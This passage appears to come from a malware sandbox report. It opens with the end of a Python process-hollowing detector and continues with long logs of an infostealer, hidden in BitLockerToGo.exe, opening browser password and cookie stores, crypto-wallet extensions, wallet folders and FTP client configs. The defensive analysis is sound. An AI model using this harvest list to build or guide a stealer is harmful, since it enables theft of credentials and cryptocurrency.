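    return sorted((json.loads(l) for l in text.splitlines() if l.strip()),
                  key=lambda e: e["ts"])


def in_windows_dir(path):
    return path.lower().startswith("c:\\windows\\")


def detect_hollowing(events):
    """One finding per (actor, target) pair that created the target, allocated
    executable memory in it and then wrote a PE header into that allocation."""
    stages = defaultdict(dict)
    for e in events:
        if e["type"] == "process_create":
            stages[(e["ppid"], e["pid"])]["create"] = e
        elif e["type"] == "remote_alloc" and e["protect"] in EXEC_PROTECTIONS:
            stages[(e["pid"], e["target_pid"])]["exec_alloc"] = e
        elif e["type"] == "remote_write" and e["first_bytes"].lower().startswith(MZ_MAGIC):
            key = (e["pid"], e["target_pid"])
            alloc = stages[key].get("exec_alloc")
            # the MZ write only counts if it lands in the executable region the
            # same actor allocated earlier (events are time-ordered)
            if alloc and alloc["base"] == e["base"]:
                stages[key]["pe_write"] = e
        elif e["type"] == "thread_resume":
            stages[(e["pid"], e["target_pid"])]["resume"] = e

    findings = []
    for (actor, target), seen in stages.items():
        if not {"create", "exec_alloc", "pe_write"} <= seen.keys():
            continue
        c = seen["create"]
        findings.append({
            "actor_pid": actor,
            "target_pid": target,
            "actor_image": c["parent_image"],
            "target_image": c["image"],
            "pe_base": seen["pe_write"]["base"],
            "suspended": bool(c["flags"] & CREATE_SUSPENDED),
            "resumed": "resume" in seen,
            # a binary under C:\Windows hosting code from a parent outside it
            "masquerade": in_windows_dir(c["image"]) and not in_windows_dir(c["parent_image"]),
        })
    return findings


if __name__ == "__main__":
    for f in detect_hollowing(load_events(SAMPLE_EVENTS)):
        print(f"hollowing: pid {f['actor_pid']} ({f['actor_image']}) -> "
              f"pid {f['target_pid']} ({f['target_image']}) PE at {f['pe_base']}, "
              f"suspended={f['suspended']} resumed={f['resumed']} masquerade={f['masquerade']}")
```

The masquerade flag is what makes this report's chain stand out: the host process is a Microsoft-signed binary from C:\Windows, so image-name or signature allowlists alone would pass it.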

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 7676, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: BitLockerToGo.exe String found in binary or memory: Wallets/Electrum-LTC
Source: BitLockerToGo.exe String found in binary or memory: Wallets/ElectronCash
Source: BitLockerToGo.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: BitLockerToGo.exe String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe String found in binary or memory: ExodusWeb3
Source: BitLockerToGo.exe String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe String found in binary or memory: keystore
Source: BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Livel
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
